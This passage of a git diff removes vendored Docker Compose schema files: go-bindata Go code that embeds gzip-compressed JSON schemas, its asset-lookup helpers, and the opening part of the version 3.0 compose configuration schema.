c\x65\xbb\xcf\x55\xbe\x6c\x0b\xfb\x6a\x70\x56\xc0\x4b\x25\x48\x26\x8e\xe6\x59\xc0\x1f\x2d\x41\x05\x5c\xa7\x83\x0b\x92\x24\xdd\xd4\x94\x95\xae\x47\x05\x87\x3f\x8d\x88\x67\xeb\x61\x92\x7c\x77\x0f\xb6\x25\xa7\x59\x1f\xfd\x0a\x07\x7c\x58\x0f\xd8\x32\xac\x17\x82\x6b\x78\xd5\x8d\x51\xd3\x5b\xb7\x2e\x10\xc5\x0b\xe0\x96\x32\x98\xcb\x41\x70\xa7\x26\x5c\xc6\xa8\xd2\xb9\xc0\xbc\xa4\x85\x4e\x4f\x0e\xfb\x85\xbc\x78\x3e\x0d\xac\xd6\xaf\x6c\xe5\x11\x98\x16\x44\xe6\xa4\x2c\x47\x76\x10\x44\x72\x4c\xd7\x49\x4a\x35\x54\xca\x6f\x62\x92\xd6\x9c\x7e\xa9\xe1\x8f\x8e\x44\x63\x0d\xae\xdc\x12\x85\x5c\x5e\xf0\x0e\x4
5\x2d\x73\x49\xd0\x24\xd8\xb4\xfb\xd3\x42\x54\x15\xe1\x4b\x65\xdd\x35\x76\xcc\xf0\xbc\xe0\x9a\x50\x0e\x98\x73\x52\xc5\x12\xc9\x9c\x3a\xe0\xa5\xca\xdb\xfa\x37\x99\x46\xdb\xbc\xe5\x57\x8e\x80\xa1\x18\x2e\x1a\x8f\x92\x4f\x25\x76\x2b\xc6\xa4\xb6\xd1\x2d\x75\x18\x73\x05\x04\x8b\xfd\x8d\xfc\xa2\x22\x94\xcf\xf1\x1d\x70\x8d\x47\x29\x68\x9b\x2f\xbf\x5c\x22\x00\x3f\xe4\x03\x96\x5c\xed\x06\xe0\x07\x8a\x82\x57\xfd\x69\x98\x03\x30\x03\xc8\x1b\xfe\x57\x29\x14\xb8\x8e\x71\x0c\xb4\x97\x06\x53\x47\x3e\xe9\x39\x9e\x7b\xc3\xd7\x49\xca\xeb\x6a\x03\x68\x5a\xba\x11\xe5\x56\x60\x45\x8c\xb2\xfd\xde\xd6\xf2\xc8\xd3\x9e\xcc\xb3\x1d\x68\xdb\x60\xca\x3a\x61\x39\xa3\xfc\x65\xf9\x14\x87\x57\x8d\x24\xdf\x0b\xa5\xe7\x63\xb8\xc5\xbe\x07\xc2\xf4\xbe\xd8\x43\xf1\x32\xc1\x6e\x53\x8d\xb8\x85\xd2\x73\x92\x9c\x56\x64\x17\x27\x92\x45\x8c\x84\x91\x0d\xb0\x9b\xec\x5c\xd4\xf9\x96\x58\xb1\xdb\x19\xd2\x50\xc6\x5d\x74\x2e\xdd\x72\xac\xe6\x97\x48\x0f\x80\x73\x0b\xb8\x90\xe7\x86\xcb\x5d\x8c\x37\x20\x49\xbc\xfb\x1c\x91\x7e\x7a\x6c\x9b\xcf\x89\x53\xd5\xfc\xc7\x58\x9a\xb9\xed\x42\xe2\xd4\x7d\xdf\x13\xc7\xc2\x79\x0d\xc5\x28\x2a\x15\x29\x4c\xdf\x80\xa0\x02\x71\x3d\x93\x76\xcd\x7e\x5e\x89\x32\x94\xa0\x17\xc4\xae\x6f\x82\x48\x7d\x75\x21\x4c\x6e\xea\x1f\x67\x85\x2e\x7a\x81\x88\x58\x13\x52\x6f\xae\x9a\x67\x75\xe3\x29\xd6\xd0\x11\x46\x89\x82\xf8\x61\x0f\x3a\x72\x24\x8d\xca\xc3\x87\x99\x39\xe1\xe3\xfd\xef\x24\x6f\x80\x35\x28\x73\x7e\x8f\x1c\x11\x75\x56\xa5\x39\x6e\x3e\x45\xb2\xc8\x69\xfb\xc1\x2d\xbc\xa4\x65\x18\x2b\x1a\x84\xb0\x0f\x98\x14\xa8\x2f\x4e\xd7\xbf\x53\xee\xdb\xad\xef\xae\xf6\x12\xe9\x81\x32\xd8\xc1\xf8\xd6\xb2\x11\x82\x01\xe1\x23\xe8\x41\x20\x65\x2e\x38\x3b\xce\xa0\x54\x9a\x60\xf4\x42\xa1\xa0\xa8\x91\xea\x63\x2e\xa4\x5e\xbc\xcf\x50\xfb\x2a\x57\xf4\x1b\x8c\xa3\x79\xc6\xfb\x4e\x50\x36\xe2\x39\xaa\x42\xdf\x56\xaf\x95\x2e\x29\xcf\x85\x04\x1e\xf5\x8e\xd2\x42\xe6\x3b\x24\x05\xe4\x12\x90\x8a\xd2\x67\xe0\xda\x8e\x75\x59\x23\x31\xfb\x5f\x8a\x51\x74\xc7\x09\x8b\x39\x5a\x57\x72\x7b\xe3\xc5\x42\xeb\x78\xb8\x6b\x46\x2b\x1a\x3
e\x07\x1e\x80\x9d\x51\x03\x5a\xfc\xf7\xc3\xfe\x04\xe4\x9f\x35\xa5\x5c\xc3\x0e\xd0\x87\x94\x13\x5d\xc7\x74\xd3\x31\xa3\xdb\xd8\x13\x1c\x07\x74\x42\x8f\x86\x41\x89\xad\xf6\x33\xf8\x7a\x11\xaf\x5e\xa3\xe1\x6f\x23\x6f\xdd\x29\x92\x79\xe9\xaf\x82\x73\x57\x8d\x2c\x88\xa8\x27\x2f\xa2\xd6\x2a\xda\x18\x36\x34\x5c\x4d\x35\x35\x03\xa9\x35\xc5\x5c\x14\x2f\x4c\xa3\x64\x0e\x41\x49\xfd\xda\xae\x1c\xcb\xae\x98\x23\x3b\x77\x96\x5e\x80\x6f\xa2\x68\x93\x46\x27\xb0\xd3\xd3\xcd\x8e\x28\x38\x79\xa4\x8a\x6c\x9c\x99\x9b\xef\x70\x9b\x6c\xc4\x43\x1c\x63\x10\x34\x52\x27\x2e\x1d\xda\x8e\xf0\x04\xd4\xaf\x39\x38\xd0\xb4\x02\x51\xfb\x6b\xd6\xca\xce\xef\x8e\x29\xb5\x26\xb3\x91\xa0\x5a\x94\x6e\x4c\x9f\x87\xa0\xf6\xfd\x45\x34\x70\x73\x0e\x09\x82\x64\xb4\x20\x2a\x06\x44\x77\x5c\x50\x6b\x59\x12\x0d\x79\xfb\xa2\xea\x2a\xe8\x9f\xc0\x7c\x49\x90\x30\x06\x8c\xaa\x6a\x0e\x86\xa6\x25\x30\x72\xbc\xa9\x7c\x36\xec\x5b\x42\x59\x8d\x90\x93\x42\x77\xef\xc2\x22\x39\x97\x56\x82\x53\x2d\xbc\x08\x31\x6f\xcb\x8a\xbc\xe6\xfd\xb6\x0d\x89\xf7\xc0\x04\xdb\xba\xb9\x77\x4b\x2b\x13\x94\xa8\xb1\xb8\x70\xf6\xcd\x21\x3a\xd7\xfa\x40\xc6\xf4\x3b\x5e\x98\x8e\xa0\x0c\x92\x0c\x57\xff\x28\x7f\xb4\xb4\x74\x7d\x66\x2e\x05\xa3\xc5\x71\x29\x0b\x0b\xc1\x5b\x27\xcf\x49\x88\x3b\x33\xd0\xa4\x83\x69\x85\x2a\xa9\xa3\x87\xb5\x61\xf8\x4a\x79\x29\xbe\x5e\xb1\xe1\x72\xa9\x24\x19\x29\xc0\xc1\xbb\x7b\x1d\xad\x34\x12\xca\xf5\xd5\xe5\xfc\x5e\xb3\xee\xa8\xe6\x43\x7e\x46\x50\x7f\xa0\x8b\xbf\x49\x0d\x20\x7d\x21\xeb\xe8\x3c\xa8\x82\x4a\xa0\x37\x01\x17\x78\xf3\x1d\x33\xb1\x27\x5b\xa0\xaa\xcd\x1a\x20\x76\x54\xe6\xbe\xb8\xf8\x6d\x23\x3e\x24\xcc\xe2\x80\x44\x25\xa9\x96\x3a\x1d\xb3\x47\xaa\xa9\xb7\x06\x27\xd3\xa3\x88\x24\x3c\x8e\x88\x69\x1d\xd7\xbd\xa3\x50\xf5\x86\xc3\x64\x47\x65\xf9\xd3\xf7\x9e\x77\xfe\x35\xe5\x14\xbe\x94\xdc\x07\x7a\xfd\xdb\x90\x40\x54\x9f\x87\x9e\x79\x3d\xf8\x2a\x9b\x1d\xe2\xe0\xab\x88\xe5\xf4\xbf\xb2\xc1\xbb\x03\x33\xba\x2f\x37\x22\x90\xd1\x51\xfd\x46\x8c\xdf\xf9\x75\x65\x7e\x39\x43\x2a\x2b\xcf\x2e\xef\x8f\x53\x29\x31\x7b\x3a\xdf\x71\x64\x6
3\x35\x5c\x32\xcf\x07\x74\x63\xb4\x9d\x1a\x4a\xf4\x24\x81\x69\xad\xb3\x69\xe7\xc4\x69\xcb\x17\xcc\xf0\xc7\x77\x13\x35\x65\xea\x2d\xda\x0f\x02\xe3\x05\x06\x3e\xfe\x98\x3a\x8d\x68\xef\xdd\xcb\xaf\xc0\x02\xa0\x66\xf1\x5f\x7c\x13\x66\xec\xe4\xc7\x8b\xf9\xc6\xf7\xf1\xd0\xae\xfd\x9e\x2b\x1b\xf9\xc7\x21\x69\xdf\x49\x5b\x90\x92\xd9\xbd\x79\x28\x8c\xde\x2f\xc5\xdc\x91\x61\xff\xc5\x56\xe6\x87\xab\x95\xfd\xb7\xf9\xba\x6e\x75\x5a\xfd\x13\x00\x00\xff\xff\x46\xf7\x7b\x23\xe5\x2a\x00\x00") - -func dataConfig_schema_v30JsonBytes() ([]byte, error) { - return bindataRead( - _dataConfig_schema_v30Json, - "data/config_schema_v3.0.json", - ) -} - -func dataConfig_schema_v30Json() (*asset, error) { - bytes, err := dataConfig_schema_v30JsonBytes() - if err != nil { - return nil, err - } - - info := bindataFileInfo{name: "data/config_schema_v3.0.json", size: 0, mode: os.FileMode(0), modTime: time.Unix(0, 0)} - a := &asset{bytes: bytes, info: info} - return a, nil -} - -var _dataConfig_schema_v31Json = []byte("\x1f\x8b\x08\x00\x00\x09\x6e\x88\x00\xff\xec\x1a\xcb\x8e\xdb\x36\xf0\xee\xaf\x10\x94\xdc\xe2\xdd\x4d\xd1\xa0\x40\x73\xeb\xb1\xa7\xf6\xdc\x85\x23\xd0\xd2\x58\x66\x96\x22\x19\x92\x72\xd6\x09\xfc\xef\x05\xf5\x32\x45\x91\x22\x6d\x2b\xd9\x45\xd1\xd3\xae\xc5\x99\xe1\xbc\x67\x38\xe4\xf7\x55\x92\xa4\x6f\x65\xbe\x87\x0a\xa5\x1f\x93\x74\xaf\x14\xff\xf8\xf0\xf0\x59\x32\x7a\xd7\x7e\xbd\x67\xa2\x7c\x28\x04\xda\xa9\xbb\xf7\x1f\x1e\xda\x6f\x6f\xd2\xb5\xc6\xc3\x85\x46\xc9\x19\xdd\xe1\x32\x6b\x57\xb2\xc3\xaf\xf7\xbf\xdc\x6b\xf4\x16\x44\x1d\x39\x68\x20\xb6\xfd\x0c\xb9\x6a\xbf\x09\xf8\x52\x63\x01\x1a\xf9\x31\x3d\x80\x90\x98\xd1\x74\xb3\x5e\xe9\x35\x2e\x18\x07\xa1\x30\xc8\xf4\x63\xa2\x99\x4b\x92\x01\xa4\xff\x60\x90\x95\x4a\x60\x5a\xa6\xcd\xe7\x53\x43\x21\x49\x52\x09\xe2\x80\x73\x83\xc2\xc0\xea\x9b\x87\x33\xfd\x87\x01\x6c\x6d\x53\x35\x98\x6d\xbe\x73\xa4\x14\x08\xfa\xf7\x94\xb7\x66\xf9\xd3\x23\xba\xfb\xf6\xc7\xdd\x3f\xef\xef\x7e\xbf\xcf\xee\x36\xef\xde\x8e\x96\xb5\x7e\x05\xec\xda\xed\x0b\xd8\x61\x8a\x15\x6
6\x74\xd8\x3f\x1d\x20\x4f\xdd\x7f\xa7\x61\x63\x54\x14\x0d\x30\x22\xa3\xbd\x77\x88\x48\x18\xcb\x4c\x41\x7d\x65\xe2\x29\x24\xf3\x00\xf6\x42\x32\x77\xfb\x3b\x64\x1e\x8b\x73\x60\xa4\xae\x82\x16\xec\xa1\x5e\x48\x98\x76\xfb\x65\xec\x27\x21\x17\xa0\xc2\x2e\xdb\x42\xbd\x98\xc7\xea\xed\x6f\x13\x78\xd5\x0b\x3d\x0b\xdb\x42\x18\x7b\x37\x0c\x8e\xc2\xdb\xa5\x2a\x57\x78\xf9\x75\x35\x28\xcb\xa3\xa5\x02\x38\x61\x47\xfd\xcd\xa3\x8f\x16\xa0\x02\xaa\xd2\x41\x05\x49\x92\x6e\x6b\x4c\x0a\x5b\xa3\x8c\xc2\x5f\x9a\xc4\xa3\xf1\x31\x49\xbe\xdb\x99\xcc\xa0\xd3\xac\x8f\x7e\xf9\x0d\x3e\xac\x7b\x64\x19\xd6\x73\x46\x15\x3c\xab\x46\xa8\xf9\xad\x5b\x15\xb0\xfc\x09\xc4\x0e\x13\x88\xc5\x40\xa2\x94\x33\x2a\x23\x58\xaa\x8c\x89\xac\xc0\xb9\x4a\x4f\x16\xfa\x84\x5e\xd8\x9f\x06\x54\xe3\xd7\x66\xe5\x20\x98\xe6\x88\x67\xa8\x28\x46\x72\x20\x21\xd0\x31\x5d\x27\x29\x56\x50\x49\xb7\x88\x49\x5a\x53\xfc\xa5\x86\x3f\x3b\x10\x25\x6a\xb0\xe9\x16\x82\xf1\xe5\x09\x97\x82\xd5\x3c\xe3\x48\x68\x07\x9b\x57\x7f\x9a\xb3\xaa\x42\x74\x29\xaf\xbb\x44\x8e\x08\xcd\x33\xaa\x10\xa6\x20\x32\x8a\xaa\x90\x23\xe9\xa8\x03\x5a\xc8\xac\x2d\xf8\xb3\x6e\xb4\xcb\x5a\x7c\x69\x11\x18\xaa\xff\xa2\xf6\x28\xe8\x9c\x63\xb7\x64\xb4\x6b\x6b\xde\x52\x0b\x31\x93\x80\x44\xbe\xbf\x12\x9f\x55\x08\xd3\x18\xdd\x01\x55\xe2\xc8\x19\x6e\xfd\xe5\xd5\x39\x02\xd0\x43\x36\xe4\x92\x8b\xd5\x00\xf4\x80\x05\xa3\x55\x1f\x0d\x31\x09\x66\x48\xf2\x1a\xff\x99\x33\x09\xb6\x62\x2c\x01\xcd\xa5\x41\xd4\x91\x4e\x7a\x8c\xc7\x5e\xf0\x75\x92\xd2\xba\xda\x82\xd0\x3d\xec\x08\x72\xc7\x44\x85\x34\xb3\xfd\xde\xc6\xf2\x48\xd3\x0e\xcf\x33\x15\x68\xca\xa0\xcb\x3a\x22\x19\xc1\xf4\x69\x79\x17\x87\x67\x25\x50\xb6\x67\x52\xc5\xe7\x70\x03\x7d\x0f\x88\xa8\x7d\xbe\x87\xfc\x69\x06\xdd\x84\x1a\x61\x33\xa9\x62\x9c\x1c\x57\xa8\x0c\x03\xf1\x3c\x04\x42\xd0\x16\xc8\x55\x72\x2e\xaa\x7c\x83\x2c\x2b\x4b\x0d\xea\xf3\xb8\x49\xe7\xd2\x2d\x87\x6a\x7e\x21\xf0\x01\x44\x6c\x01\x67\xfc\xdc\x70\xd9\x8b\xe1\x06\x24\x09\x77\x9f\x23\xd0\x4f\xf7\x6d\xf3\x39\x13\x55\xcd\x7f\x84\xa4\x1b\xbb\x5d\x48\xac\xba\xef\xfa\x62\x4
9\x18\xd7\x50\x8c\xac\x52\xa1\x5c\xf7\x0d\x02\xa4\xc7\xae\x67\xd0\xee\x74\x93\x55\xac\xf0\x39\xe8\x04\xd8\xd6\x8d\x37\x53\x5f\x5c\x08\x93\xab\xfa\xc7\x28\xd3\x05\x0f\x10\x01\x69\x7c\xec\xc5\xb2\x79\x66\x37\xec\x62\x0d\x1c\x22\x18\x49\x08\x07\xbb\x57\x91\x23\x6a\x98\x1f\x3e\x44\xfa\x84\x0b\xf7\xb7\x59\x5c\x0f\xaa\x97\x66\x7c\x8f\x1c\x20\x75\x66\xa5\x09\x37\x17\x23\x9b\x40\xb4\xfd\xe0\x16\x9e\xe3\xc2\x9f\x2b\x9a\x0c\x61\x06\x18\x67\x42\x4d\xa2\xeb\xe7\x94\xfb\x76\xeb\x9b\xab\x3d\x17\xf8\x80\x09\x94\x30\x3e\xb5\x6c\x19\x23\x80\xe8\x28\xf5\x08\x40\x45\xc6\x28\x39\x46\x40\x4a\x85\x44\xf0\x40\x21\x21\xaf\x05\x56\xc7\x8c\x71\xb5\x78\x9f\x21\xf7\x55\x26\xf1\x37\x18\x5b\xf3\x9c\xef\x3b\x42\x1b\x8b\x21\x6b\x42\x72\xa5\x41\x7d\x29\x29\x1c\xc6\x8e\x44\x18\x4c\x54\xe1\x14\x95\x4a\x56\x8b\x3c\xf6\x80\xad\xf7\x44\xa2\x84\xd8\x23\xbc\x76\xb7\x71\xd8\xcc\x03\x97\x97\x00\x4f\x0a\x5d\x67\xc2\x50\x55\xb6\x7f\x9b\x79\xe5\xe4\x0c\x7d\x79\x94\xb9\xba\xae\x5b\x93\xaa\xc0\x34\x63\x1c\x68\x30\x36\xa4\x62\x3c\x2b\x05\xca\x21\xe3\x20\x30\x73\xaa\x62\x6d\x46\x7a\x51\x0b\xa4\xf7\x9f\x92\x91\xb8\xa4\x88\x84\xc2\x4c\x55\x7c\x77\xe5\xb1\x52\xa9\x70\xb0\xd7\x04\x57\xd8\x1f\x34\x0e\xaf\x8d\xe8\x00\xda\xea\xef\x2e\xfa\x33\x05\xff\xcc\x29\xa6\x0a\x4a\xed\x26\x53\xa7\x9a\xe9\x39\xe7\x5b\xce\x88\x5e\x73\x8f\xc4\xd8\xa0\x33\x7c\x24\x6d\x60\xee\x94\x1b\xc1\xd5\x89\x3a\xf9\x1a\xdd\x75\x34\xf4\xd6\x1d\x23\x1b\x27\xfc\x45\xc5\xdc\x66\x63\xe3\xad\xa7\xee\xa0\xaa\x65\xf0\x58\xd0\xc0\x50\x39\xd7\xd2\x0e\xa0\xc6\xd0\x7e\xd1\x6a\xa1\xdb\x64\x1d\x04\x05\x76\x73\xbb\xb2\x24\xbb\x60\xec\x6e\x9d\x58\x7b\x02\xae\x79\xb2\x09\x1a\x9c\xbf\xcf\xcf\xb6\x3b\x20\xef\xdc\x19\x4b\xb4\xb5\x26\xae\xae\xe0\xd6\xde\x28\x0e\xe1\x1c\x23\x40\x09\x6c\xd9\xa5\x4f\xd4\x66\x3e\x01\xf9\x3a\xc7\x46\x0a\x57\xc0\x6a\x77\xc1\x5b\x99\xfe\xdd\x21\xa5\xc6\x5c\x3e\x60\x54\x03\xd2\xb6\xe9\xe3\x60\xd4\xbe\xbb\x0c\x1a\x2e\x26\x48\x04\x70\x82\x73\x24\x43\x89\xe8\x86\xf1\x44\xcd\x0b\xa4\x20\x6b\xef\x65\x2f\x4a\xfd\x33\x39\x9f\x23\x81\x08\x01\x82\x65\x1
5\x93\x43\xd3\x02\x08\x3a\x5e\x55\x3e\x1b\xf4\x1d\xc2\xa4\x16\x90\xa1\x5c\x75\x57\xbf\x01\x9f\x4b\x2b\x46\xb1\x62\xce\x0c\x11\xb7\x65\x85\x9e\xb3\x7e\xdb\x06\x24\xd4\xd9\x8c\x9b\xfa\xd8\xc9\x82\xe1\x09\x6d\xe3\x77\x59\x75\x9e\x31\xd1\xb9\xd6\x7b\x3c\xa6\xdf\x71\x22\xba\x00\xa9\x33\xc9\x30\xf8\x09\xe2\x07\x4b\x4b\x77\xca\xc8\x38\x23\x38\x3f\x2e\x25\x61\xce\x68\xab\xe4\x18\x87\xb8\xd1\x03\xb5\x3b\xe8\x56\xa8\xe2\x2a\x18\xac\x0d\xc2\x57\x4c\x0b\xf6\xf5\x82\x0d\x97\x73\x25\x4e\x50\x0e\x56\xbe\xbb\x55\xd1\x52\x09\x84\xa9\xba\xb8\x9c\xdf\x2a\xd6\x0d\xd5\x7c\xf0\xcf\x40\xd6\x1f\xe0\xc2\xf7\xe8\x9e\x4c\x9f\xf3\x3a\x38\x0d\xac\xa0\x62\xc2\xe9\x80\x0b\x3c\xf4\x08\x89\xd8\x83\x2d\x50\xd5\xa2\xc6\xc7\x1d\x54\xc6\xf8\xf2\xa7\x8d\xf0\x88\x78\x13\x4e\x48\x98\xa3\x6a\xa9\xe8\x88\x1e\xa8\xa7\xce\x1a\x9c\xcc\xcf\x2d\x12\xff\xec\x22\xc4\x75\x98\xf7\x0e\x42\xd6\x5b\xea\x19\x21\x4c\x4f\x19\xae\x5b\xfe\xf8\x63\xca\xc9\x7f\x28\xb9\x2d\xe9\xf5\x77\x61\x1e\xab\x3e\x0e\x3d\xf3\x7a\xd0\xd5\x26\xda\xc4\xde\x8b\xa8\xe5\xf8\x6f\xda\x77\x7b\x44\xe0\xea\xf3\x2f\xec\x04\x6f\x48\x2e\xdd\x8b\xa6\x40\x6e\xe9\xa0\xfe\x4f\x2d\xff\x11\x47\xfc\x79\xfe\xd5\x3d\x20\x0b\xbe\xdc\x6a\xa0\xae\x2e\xce\x11\xcf\x95\x5e\x81\xcd\x5e\xda\x14\xe3\xc1\xa2\x61\x92\xe9\x99\x7f\x4e\x93\xd1\xf7\x69\x1d\xc6\x66\xcc\x86\x0d\xe6\x78\xe3\x3b\xae\x90\x73\x83\xa4\x1e\xc4\x73\xbf\x62\x6d\xda\x29\x71\x5e\xf2\x05\x93\xcd\xfd\xbb\x99\x3e\x60\xee\xde\xfb\x07\x15\xd0\x05\x86\x74\x6e\x9b\x5a\x87\x87\x5e\xbb\xd3\x77\x9b\x9e\xf8\x37\xf0\x27\xaf\x38\xb5\x9c\xf4\x38\x99\x49\x7d\x1f\x0f\x5a\xdb\x17\x98\x9b\x91\x7e\x2c\x90\xf6\x15\x89\x91\xdd\x37\xe6\x79\xca\x67\x46\xe7\xdb\x4e\x7b\xcc\xdb\xbf\xb1\xf4\xdc\x6a\xac\xcc\xbf\xcd\x7b\xd8\xd5\x69\xf5\x6f\x00\x00\x00\xff\xff\xfc\xf3\x11\x6a\x88\x2f\x00\x00") - -func dataConfig_schema_v31JsonBytes() ([]byte, error) { - return bindataRead( - _dataConfig_schema_v31Json, - "data/config_schema_v3.1.json", - ) -} - -func dataConfig_schema_v31Json() (*asset, error) { - bytes, err := 
dataConfig_schema_v31JsonBytes() - if err != nil { - return nil, err - } - - info := bindataFileInfo{name: "data/config_schema_v3.1.json", size: 0, mode: os.FileMode(0), modTime: time.Unix(0, 0)} - a := &asset{bytes: bytes, info: info} - return a, nil -} - -// Asset loads and returns the asset for the given name. -// It returns an error if the asset could not be found or -// could not be loaded. -func Asset(name string) ([]byte, error) { - cannonicalName := strings.Replace(name, "\\", "/", -1) - if f, ok := _bindata[cannonicalName]; ok { - a, err := f() - if err != nil { - return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err) - } - return a.bytes, nil - } - return nil, fmt.Errorf("Asset %s not found", name) -} - -// MustAsset is like Asset but panics when Asset would return an error. -// It simplifies safe initialization of global variables. -func MustAsset(name string) []byte { - a, err := Asset(name) - if err != nil { - panic("asset: Asset(" + name + "): " + err.Error()) - } - - return a -} - -// AssetInfo loads and returns the asset info for the given name. -// It returns an error if the asset could not be found or -// could not be loaded. -func AssetInfo(name string) (os.FileInfo, error) { - cannonicalName := strings.Replace(name, "\\", "/", -1) - if f, ok := _bindata[cannonicalName]; ok { - a, err := f() - if err != nil { - return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err) - } - return a.info, nil - } - return nil, fmt.Errorf("AssetInfo %s not found", name) -} - -// AssetNames returns the names of the assets. -func AssetNames() []string { - names := make([]string, 0, len(_bindata)) - for name := range _bindata { - names = append(names, name) - } - return names -} - -// _bindata is a table, holding each asset generator, mapped to its name. 
-var _bindata = map[string]func() (*asset, error){ - "data/config_schema_v3.0.json": dataConfig_schema_v30Json, - "data/config_schema_v3.1.json": dataConfig_schema_v31Json, -} - -// AssetDir returns the file names below a certain -// directory embedded in the file by go-bindata. -// For example if you run go-bindata on data/... and data contains the -// following hierarchy: -// data/ -// foo.txt -// img/ -// a.png -// b.png -// then AssetDir("data") would return []string{"foo.txt", "img"} -// AssetDir("data/img") would return []string{"a.png", "b.png"} -// AssetDir("foo.txt") and AssetDir("notexist") would return an error -// AssetDir("") will return []string{"data"}. -func AssetDir(name string) ([]string, error) { - node := _bintree - if len(name) != 0 { - cannonicalName := strings.Replace(name, "\\", "/", -1) - pathList := strings.Split(cannonicalName, "/") - for _, p := range pathList { - node = node.Children[p] - if node == nil { - return nil, fmt.Errorf("Asset %s not found", name) - } - } - } - if node.Func != nil { - return nil, fmt.Errorf("Asset %s not found", name) - } - rv := make([]string, 0, len(node.Children)) - for childName := range node.Children { - rv = append(rv, childName) - } - return rv, nil -} - -type bintree struct { - Func func() (*asset, error) - Children map[string]*bintree -} -var _bintree = &bintree{nil, map[string]*bintree{ - "data": &bintree{nil, map[string]*bintree{ - "config_schema_v3.0.json": &bintree{dataConfig_schema_v30Json, map[string]*bintree{}}, - "config_schema_v3.1.json": &bintree{dataConfig_schema_v31Json, map[string]*bintree{}}, - }}, -}} - -// RestoreAsset restores an asset under the given directory -func RestoreAsset(dir, name string) error { - data, err := Asset(name) - if err != nil { - return err - } - info, err := AssetInfo(name) - if err != nil { - return err - } - err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755)) - if err != nil { - return err - } - err = ioutil.WriteFile(_filePath(dir, name), 
data, info.Mode()) - if err != nil { - return err - } - err = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime()) - if err != nil { - return err - } - return nil -} - -// RestoreAssets restores an asset under the given directory recursively -func RestoreAssets(dir, name string) error { - children, err := AssetDir(name) - // File - if err != nil { - return RestoreAsset(dir, name) - } - // Dir - for _, child := range children { - err = RestoreAssets(dir, filepath.Join(name, child)) - if err != nil { - return err - } - } - return nil -} - -func _filePath(dir, name string) string { - cannonicalName := strings.Replace(name, "\\", "/", -1) - return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...) -} - diff --git a/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json b/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json deleted file mode 100644 index fbcd8bb859..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json +++ /dev/null @@ -1,383 +0,0 @@ -{ - "$schema": "http://json-schema.org/draft-04/schema#", - "id": "config_schema_v3.0.json", - "type": "object", - "required": ["version"], - - "properties": { - "version": { - "type": "string" - }, - - "services": { - "id": "#/properties/services", - "type": "object", - "patternProperties": { - "^[a-zA-Z0-9._-]+$": { - "$ref": "#/definitions/service" - } - }, - "additionalProperties": false - }, - - "networks": { - "id": "#/properties/networks", - "type": "object", - "patternProperties": { - "^[a-zA-Z0-9._-]+$": { - "$ref": "#/definitions/network" - } - } - }, - - "volumes": { - "id": "#/properties/volumes", - "type": "object", - "patternProperties": { - "^[a-zA-Z0-9._-]+$": { - "$ref": "#/definitions/volume" - } - }, - "additionalProperties": false - } - }, - - "additionalProperties": false, - - "definitions": { - - "service": { - "id": "#/definitions/service", - "type": "object", - - 
"properties": { - "deploy": {"$ref": "#/definitions/deployment"}, - "build": { - "oneOf": [ - {"type": "string"}, - { - "type": "object", - "properties": { - "context": {"type": "string"}, - "dockerfile": {"type": "string"}, - "args": {"$ref": "#/definitions/list_or_dict"} - }, - "additionalProperties": false - } - ] - }, - "cap_add": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "cap_drop": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "cgroup_parent": {"type": "string"}, - "command": { - "oneOf": [ - {"type": "string"}, - {"type": "array", "items": {"type": "string"}} - ] - }, - "container_name": {"type": "string"}, - "depends_on": {"$ref": "#/definitions/list_of_strings"}, - "devices": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "dns": {"$ref": "#/definitions/string_or_list"}, - "dns_search": {"$ref": "#/definitions/string_or_list"}, - "domainname": {"type": "string"}, - "entrypoint": { - "oneOf": [ - {"type": "string"}, - {"type": "array", "items": {"type": "string"}} - ] - }, - "env_file": {"$ref": "#/definitions/string_or_list"}, - "environment": {"$ref": "#/definitions/list_or_dict"}, - - "expose": { - "type": "array", - "items": { - "type": ["string", "number"], - "format": "expose" - }, - "uniqueItems": true - }, - - "external_links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "extra_hosts": {"$ref": "#/definitions/list_or_dict"}, - "healthcheck": {"$ref": "#/definitions/healthcheck"}, - "hostname": {"type": "string"}, - "image": {"type": "string"}, - "ipc": {"type": "string"}, - "labels": {"$ref": "#/definitions/list_or_dict"}, - "links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - - "logging": { - "type": "object", - - "properties": { - "driver": {"type": "string"}, - "options": { - "type": "object", - "patternProperties": { - "^.+$": {"type": ["string", "number", "null"]} - } - } - }, - "additionalProperties": false - }, - 
- "mac_address": {"type": "string"}, - "network_mode": {"type": "string"}, - - "networks": { - "oneOf": [ - {"$ref": "#/definitions/list_of_strings"}, - { - "type": "object", - "patternProperties": { - "^[a-zA-Z0-9._-]+$": { - "oneOf": [ - { - "type": "object", - "properties": { - "aliases": {"$ref": "#/definitions/list_of_strings"}, - "ipv4_address": {"type": "string"}, - "ipv6_address": {"type": "string"} - }, - "additionalProperties": false - }, - {"type": "null"} - ] - } - }, - "additionalProperties": false - } - ] - }, - "pid": {"type": ["string", "null"]}, - - "ports": { - "type": "array", - "items": { - "type": ["string", "number"], - "format": "ports" - }, - "uniqueItems": true - }, - - "privileged": {"type": "boolean"}, - "read_only": {"type": "boolean"}, - "restart": {"type": "string"}, - "security_opt": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "shm_size": {"type": ["number", "string"]}, - "sysctls": {"$ref": "#/definitions/list_or_dict"}, - "stdin_open": {"type": "boolean"}, - "stop_grace_period": {"type": "string", "format": "duration"}, - "stop_signal": {"type": "string"}, - "tmpfs": {"$ref": "#/definitions/string_or_list"}, - "tty": {"type": "boolean"}, - "ulimits": { - "type": "object", - "patternProperties": { - "^[a-z]+$": { - "oneOf": [ - {"type": "integer"}, - { - "type":"object", - "properties": { - "hard": {"type": "integer"}, - "soft": {"type": "integer"} - }, - "required": ["soft", "hard"], - "additionalProperties": false - } - ] - } - } - }, - "user": {"type": "string"}, - "userns_mode": {"type": "string"}, - "volumes": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "working_dir": {"type": "string"} - }, - 